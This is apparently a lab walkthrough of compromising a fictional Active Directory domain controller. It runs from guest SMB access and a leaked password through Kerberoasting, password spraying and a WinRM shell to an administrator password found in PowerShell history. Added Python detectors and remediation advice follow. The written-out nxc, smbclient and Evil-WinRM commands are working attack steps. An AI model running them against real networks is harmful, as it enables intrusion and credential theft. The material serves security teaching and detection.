HackSmarter: MartiniAD


MartiniAD

A HackSmarter walkthrough

The Setup

Martini Bars, an adult beverage company, had a corporate breach. Their compliance and risk team requested a penetration test at one of the branch offices, and the HackSmarter team was authorized to run an internal black-box pentest.

This was a black-box engagement, so I started with nothing: the client gave me VPN access to their internal network, with no usernames and no passwords. I connected to the VPN and began.

Step 1: Recon With Nmap

I scanned the host (10.0.30.48) with Nmap to see what was running.

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: DRY.MARTINI.BARS)
445/tcp open microsoft-ds
464/tcp open kpasswd5
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: DRY.MARTINI.BARS)
3389/tcp open ms-wbt-server
5985/tcp open http Microsoft HTTPAPI httpd 2.0
9389/tcp open mc-nmf .NET Message Framing

Ports 53 (DNS), 88 (Kerberos), 389 (LDAP) and 445 (SMB) open together point to a Domain Controller. The certificate and RDP info from the scan confirmed it.

DNS_Computer_Name: DC01.DRY.MARTINI.BARS
Product_Version: 10.0.26100

The target is a DC named DC01 in the domain DRY.MARTINI.BARS, running Windows Server (build 10.0.26100). Ports 5985 (WinRM) and 3389 (RDP) are also open.

Step 2: Add DC01 to the Hosts File

Kerberos and most AD tooling need hostnames, not just IP addresses, so I added the DC to my hosts file.

sudo sh -c 'echo "10.0.30.48 DC01.DRY.MARTINI.BARS DRY.MARTINI.BARS" >> /etc/hosts'

The DC's full hostname goes first as the canonical name, with the bare domain name after it as an alias, so both DC01.DRY.MARTINI.BARS and DRY.MARTINI.BARS resolve to the DC.

Step 3: SMB With No Password

I had no credentials, so I tried a null/guest session against SMB. The nonexistent user 'a' with an empty password gets mapped to Guest when the DC allows guest access.

nxc smb 10.0.30.48 -u 'a' -p '' --shares
SMB 10.0.30.48 445 DC01 [+] DRY.MARTINI.BARS\a: (Guest)
SMB 10.0.30.48 445 DC01 Share Permissions Remark
SMB 10.0.30.48 445 DC01 ----- ----------- ------
SMB 10.0.30.48 445 DC01 IPC$ READ Remote IPC
SMB 10.0.30.48 445 DC01 NETLOGON Logon server share
SMB 10.0.30.48 445 DC01 notes READ,WRITE
SMB 10.0.30.48 445 DC01 SYSVOL Logon server share

Guest access was enabled. A share called notes was readable and writable without any login.

Step 4: Read the Notes Share

I connected to the share with no password and listed the contents.

smbclient //10.0.30.48/notes --no-pass
smb: \> ls
notes.txt A 129 Sat Jun 27 08:24:43 2026

I opened the file.

- Order more gin for lakeside
- Look for an engagement ring
- Check that notes works from Linux Mint
creds
mprice:*xxxxx*

The file held a username and password: mprice : martini

Step 5: Authenticated Enumeration

The credentials worked.

nxc smb 10.0.30.48 -u mprice -p '*xxxxx*'
SMB 10.0.30.48 445 DC01 [+] DRY.MARTINI.BARS\mprice:*xxxxx*

I listed the domain users.

nxc smb 10.0.30.48 -u mprice -p '*xxxxx*' --users
SMB 10.0.30.48 445 DC01 Administrator
SMB 10.0.30.48 445 DC01 Guest
SMB 10.0.30.48 445 DC01 krbtgt
SMB 10.0.30.48 445 DC01 mprice
SMB 10.0.30.48 445 DC01 athena.t0
SMB 10.0.30.48 445 DC01 ATHENA_SVC

Two accounts stood out: the service account ATHENA_SVC and athena.t0.

Step 6: Kerberoast the Service Account

Any authenticated domain user can request a service ticket for any account that has an SPN set, which is what makes it a service account. Part of that ticket is encrypted with a key derived from the service account's password, so the ticket can be taken offline and cracked.

nxc ldap 10.0.30.48 -u mprice -p '*xxxxx*' --kerberoasting roast.txt
LDAP 10.0.30.48 389 DC01 [*] sAMAccountName: ATHENA_SVC
LDAP 10.0.30.48 389 DC01 $krb5tgs$23$*ATHENA_SVC$DRY.MARTINI.BARS...

I cracked the ticket offline.

ATHENA_SVC : 1xxxxx

The LDAP output showed this account is in Remote Management Users and Remote Desktop Users, so it can log in over WinRM and RDP.
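Detection-side note, as an added example that is not part of the original walkthrough: a Kerberoast request shows up on the DC as Security event 4769 with an RC4 ticket encryption type (0x17), because the tooling asks for RC4 to get a faster-cracking hash. The script below runs over constructed key=value samples of 4769 events (assumed format, not real logs) and flags successful RC4 service-ticket requests for non-machine accounts, grouped by the requesting user.

```python
# Added example (not from the write-up): flag Kerberoasting in Windows
# Security event 4769 (Kerberos service ticket requested). Roasting tools
# ask for an RC4 ticket (etype 0x17) because it cracks far faster than AES,
# while domain-joined clients normally negotiate AES (0x11/0x12).
# The 4769 records below are constructed samples in key=value form.
import re
from collections import defaultdict

SAMPLE_4769 = """\
EventID=4769 TargetUserName=mprice@DRY.MARTINI.BARS ServiceName=DC01$ TicketEncryptionType=0x12 IpAddress=10.0.30.15 Status=0x0
EventID=4769 TargetUserName=mprice@DRY.MARTINI.BARS ServiceName=ATHENA_SVC TicketEncryptionType=0x17 IpAddress=10.0.30.99 Status=0x0
EventID=4769 TargetUserName=mprice@DRY.MARTINI.BARS ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=10.0.30.99 Status=0x0
EventID=4769 TargetUserName=athena.t0@DRY.MARTINI.BARS ServiceName=DC01$ TicketEncryptionType=0x17 IpAddress=10.0.30.20 Status=0x0
EventID=4769 TargetUserName=mprice@DRY.MARTINI.BARS ServiceName=ATHENA_SVC TicketEncryptionType=0x17 IpAddress=10.0.30.99 Status=0x1f
"""

RC4_ETYPES = {"0x17", "0x18"}  # RC4-HMAC and RC4-HMAC-EXP
KV = re.compile(r"(\w+)=(\S+)")

def parse_event(line):
    """Turn one key=value record into a dict."""
    return dict(KV.findall(line))

def is_roast_candidate(ev):
    """True for a successfully issued RC4 ticket to a user-owned SPN.
    Machine accounts ($) have long random passwords and krbtgt shows up
    in routine traffic, so both are excluded to cut noise."""
    if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
        return False
    svc = ev.get("ServiceName", "")
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return ev.get("TicketEncryptionType") in RC4_ETYPES

def find_kerberoasting(log_text):
    """Return {requesting user: sorted service accounts it got RC4 tickets for}."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        ev = parse_event(line)
        if is_roast_candidate(ev):
            hits[ev["TargetUserName"]].add(ev["ServiceName"])
    return {user: sorted(svcs) for user, svcs in hits.items()}

if __name__ == "__main__":
    for user, svcs in find_kerberoasting(SAMPLE_4769).items():
        print(f"possible Kerberoast by {user}: {', '.join(svcs)}")
```

In an environment where service accounts are set to AES only, any 0x17 ticket for them is a strong signal; where RC4 is still allowed, treat one user pulling tickets for many SPNs in a short burst as the alert condition.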

Step 7: Get a Shell

I checked WinRM.

nxc winrm 10.0.30.48 -u 'athena_svc' -p 'xxxxx'
WINRM 10.0.30.48 5985 DC01 [+] DRY.MARTINI.BARS\athena_svc:xxxxx (Pwn3d!)

Pwn3d means the account is allowed to log in over WinRM, so I can get an interactive shell. RDP worked too.

Step 8: Password Spray

I sprayed the same password across every account I had found.

nxc smb 10.0.30.48 -u users.txt -p 'xxxxx' --continue-on-success
SMB 10.0.30.48 445 DC01 [+] DRY.MARTINI.BARS\athena.t0:xxxxx (Pwn3d!)
SMB 10.0.30.48 445 DC01 [+] DRY.MARTINI.BARS\ATHENA_SVC:xxxxx

athena.t0 used the same password as the service account.
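From the defender's side, as an added example not in the original post: a spray leaves a burst of logon failures (event 4625, or 4771 for Kerberos pre-auth) from one source against many different accounts, which is the opposite shape from brute force. The detector below runs over constructed sample events (assumed one-line format, not real logs) and alerts on any source that fails against five or more distinct accounts inside a ten-minute window.

```python
# Added example (not from the write-up): detect a password spray in Windows
# logon-failure events (4625, or 4771 Kerberos pre-auth failure). A spray is
# one source trying one password against MANY accounts, so the signal is many
# distinct TargetUserName values per source IP in a short window; brute force
# is the opposite (many failures, one account). Sample events are constructed.
import re
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_FAILURES = """\
2026-06-27T09:00:01 EventID=4625 TargetUserName=Administrator IpAddress=10.0.30.99
2026-06-27T09:00:02 EventID=4625 TargetUserName=Guest IpAddress=10.0.30.99
2026-06-27T09:00:02 EventID=4625 TargetUserName=krbtgt IpAddress=10.0.30.99
2026-06-27T09:00:03 EventID=4625 TargetUserName=mprice IpAddress=10.0.30.99
2026-06-27T09:00:03 EventID=4625 TargetUserName=athena.t0 IpAddress=10.0.30.99
2026-06-27T09:00:04 EventID=4771 TargetUserName=ATHENA_SVC IpAddress=10.0.30.99
2026-06-27T09:05:00 EventID=4625 TargetUserName=mprice IpAddress=10.0.30.15
2026-06-27T09:05:30 EventID=4625 TargetUserName=mprice IpAddress=10.0.30.15
2026-06-27T09:06:00 EventID=4625 TargetUserName=mprice IpAddress=10.0.30.15
"""

LINE = re.compile(r"^(\S+) EventID=(\d+) TargetUserName=(\S+) IpAddress=(\S+)$")

def parse_failures(log_text):
    """Yield (timestamp, account, source_ip) for each logon-failure event."""
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m and m.group(2) in ("4625", "4771"):
            yield datetime.fromisoformat(m.group(1)), m.group(3).lower(), m.group(4)

def find_password_spray(log_text, min_accounts=5, window=timedelta(minutes=10)):
    """Return {source_ip: sorted accounts} for every source whose failures
    cover at least min_accounts distinct accounts inside one sliding window."""
    by_src = defaultdict(list)
    for ts, account, src in parse_failures(log_text):
        by_src[src].append((ts, account))
    alerts = {}
    for src, events in by_src.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            accounts = {a for ts, a in events[i:] if ts - start <= window}
            if len(accounts) >= min_accounts:
                alerts[src] = sorted(accounts)
                break
    return alerts

if __name__ == "__main__":
    for src, accounts in find_password_spray(SAMPLE_FAILURES).items():
        print(f"possible spray from {src}: {len(accounts)} accounts {accounts}")
```

The second source in the sample (three failures, one account) is not reported, which is the point: counting distinct accounts rather than raw failures is what separates a spray from ordinary lockout noise.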

Step 9: Read the PowerShell History

With a shell as ATHENA_SVC, I checked the PowerShell history file.

*Evil-WinRM* PS C:\> type C:\Users\ATHENA_SVC\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
net user administrator "ebz0yxyxxxxx*yeh"

Someone had reset the Administrator password from this account and left the command, password included, in the PSReadLine history file.
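As an added example, not from the write-up: the same history file is an easy hunting target for defenders. The script below scans constructed sample PSReadLine history text for common credential-bearing command shapes (net user resets, ConvertTo-SecureString -AsPlainText, net use /user:) and reports each hit with the secret masked; the patterns are assumptions, not an exhaustive list.

```python
# Added example (not from the write-up): hunt for plaintext credentials in
# PSReadLine history. Every user's history lives at
# %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# and survives reboots. The history text below is constructed, and the
# patterns are assumed common command shapes, not an exhaustive list.
import re

SAMPLE_HISTORY = """\
Get-ChildItem C:\\Users
net user administrator "Example-Reset-Pass-1"
net user athena.t0 /domain
$sec = ConvertTo-SecureString 'Example-Pass-2' -AsPlainText -Force
net use Z: \\\\DC01\\notes /user:DRY\\mprice Example-Pass-3
Get-ADUser -Filter *
"""

PATTERNS = {
    # net user <name> <password> (quoted or bare); "net user <name> /domain" is only a lookup
    "net user": re.compile(r'^\s*net\s+user\s+\S+\s+("?)(?P<secret>(?!/)\S+?)\1(?:\s|$)', re.I),
    # ConvertTo-SecureString '<password>' -AsPlainText
    "ConvertTo-SecureString -AsPlainText": re.compile(
        r"ConvertTo-SecureString\s+(['\"])(?P<secret>.+?)\1.*-AsPlainText", re.I),
    # net use ... /user:<name> <password>
    "net use /user": re.compile(r"/user:\S+\s+(?P<secret>\S+)", re.I),
}

def mask(command, secret):
    """Replace the captured secret so findings can be reported safely."""
    return command.replace(secret, "******")

def find_credentials_in_history(text):
    """Return [(line_no, pattern_name, masked_command)] for each suspicious line."""
    hits = []
    for n, command in enumerate(text.splitlines(), start=1):
        for name, rx in PATTERNS.items():
            m = rx.search(command)
            if m:
                hits.append((n, name, mask(command, m.group("secret"))))
                break
    return hits

if __name__ == "__main__":
    for n, name, masked in find_credentials_in_history(SAMPLE_HISTORY):
        print(f"line {n}: {name}: {masked}")
```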

Step 10: Domain Admin

I confirmed the Administrator password.

nxc smb 10.0.30.48 -u administrator -p 'ebz0xxxxx'
SMB 10.0.30.48 445 DC01 [+] DRY.MARTINI.BARS\administrator:ebz0yxyxxxxx (Pwn3d!)

Pwn3d on the Administrator account. With two privileged accounts, the final step is to dump the domain hashes with secretsdump, including the KRBTGT hash.

Remediation

Turn off guest and null SMB access, and lock down share permissions so no share is world-writable. Never store credentials in files. Give service accounts long random passwords or use Group Managed Service Accounts. Do not reuse passwords across accounts. Avoid typing passwords into commands, and clear PowerShell history on sensitive hosts.